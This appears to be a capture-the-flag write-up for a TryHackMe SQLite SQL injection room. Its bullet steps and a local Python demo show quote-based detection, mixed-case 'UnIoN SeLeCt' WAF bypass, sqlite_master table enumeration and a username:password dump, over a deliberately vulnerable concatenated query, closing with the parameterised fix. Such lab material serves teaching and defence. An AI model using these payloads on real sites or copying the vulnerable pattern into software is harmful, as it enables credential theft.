https://tryhackme.com/room/lightroom
Keyword: SQL injection, SQLite
- Test for SQLi simply by appending a single quote ' or a double quote " to the input; a database error or a changed response means the input reaches the query unescaped.
- Once SQLi is confirmed, find the admin table name: read sqlite_master.name WHERE type='table' via a UNION SELECT. The WAF blocks the literal keyword UNION SELECT, so alter it (SQLite keywords are case-insensitive, so mixed case such as UnIoN SeLeCt is the usual first try; the exact bypass depends on what the WAF matches).
- With the admin table name known, pull the admin user's username and password (the CREATE statement stored in sqlite_master.sql gives the column names if they are not obvious).
- After confirming how many records the table holds (COUNT(*)), dump the passwords of the other users as well.
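The whole chain above, run against a local SQLite database, as an added example that is not part of the room or these notes. The table and column names (admin_users, username, password), the posts table, the concatenated query and the case-sensitive keyword blocklist standing in for the WAF are all assumptions made for the demo; the real room's schema and WAF are not known from the notes.

```python
import sqlite3


def build_db():
    """Constructed stand-in for the room's backend database (assumed schema)."""
    conn = sqlite3.connect(":memory:")
    conn.executescript("""
        CREATE TABLE admin_users (id INTEGER PRIMARY KEY, username TEXT, password TEXT);
        INSERT INTO admin_users (username, password) VALUES ('admin', 'S3cret!'), ('alice', 'alicepw');
        CREATE TABLE posts (id INTEGER PRIMARY KEY, title TEXT);
        INSERT INTO posts (title) VALUES ('Hello'), ('World');
    """)
    return conn


# Simulated WAF: the simplest possible model, a case-sensitive literal blocklist.
# Real WAFs differ; this one only illustrates why mixed case gets past a naive match.
BLOCKED_KEYWORDS = ["UNION SELECT"]


def waf_allows(value):
    return not any(k in value for k in BLOCKED_KEYWORDS)


def vulnerable_lookup(conn, user_input):
    """The bug: user input is concatenated straight into the SQL text."""
    if not waf_allows(user_input):
        return "blocked"
    sql = f"SELECT title FROM posts WHERE title = '{user_input}'"
    try:
        return [row[0] for row in conn.execute(sql)]
    except sqlite3.OperationalError as exc:
        return f"error: {exc}"


# Step 1: a lone quote breaks the string literal, so the engine throws a syntax error.
def detect(conn):
    return vulnerable_lookup(conn, "'")


# Step 2: list table names from sqlite_master; "-- " comments out the trailing quote
# of the original query, and the mixed-case UNION SELECT dodges the keyword filter.
def enumerate_tables(conn):
    payload = "' UnIoN SeLeCt name FROM sqlite_master WHERE type='table'-- "
    return sorted(vulnerable_lookup(conn, payload))


# Step 2b: SQLite has no information_schema; the CREATE statement in sqlite_master.sql
# is how you learn the column names of the table you just found.
def describe_table(conn, table):
    payload = f"' UnIoN SeLeCt sql FROM sqlite_master WHERE name='{table}'-- "
    return vulnerable_lookup(conn, payload)[0]


# Step 3: count rows before dumping, so you know how many users to expect.
def count_rows(conn, table):
    payload = f"' UnIoN SeLeCt COUNT(*) FROM {table}-- "
    return int(vulnerable_lookup(conn, payload)[0])


# Step 4: pull every username:password pair in one shot by concatenating columns.
def dump_credentials(conn, table):
    payload = f"' UnIoN SeLeCt username || ':' || password FROM {table}-- "
    rows = vulnerable_lookup(conn, payload)
    return dict(row.split(":", 1) for row in rows)


if __name__ == "__main__":
    db = build_db()
    print("detect:", detect(db))
    print("plain UNION SELECT:", vulnerable_lookup(db, "' UNION SELECT 1-- "))
    tables = enumerate_tables(db)
    print("tables:", tables)
    print("schema:", describe_table(db, "admin_users"))
    print("rows:", count_rows(db, "admin_users"))
    print("creds:", dump_credentials(db, "admin_users"))
```

The fix on the defender's side is the usual one: bind parameters (`conn.execute("... WHERE title = ?", (user_input,))`) instead of concatenating, and treat the keyword blocklist as defence in depth at best, since it is bypassed here by a change of case alone.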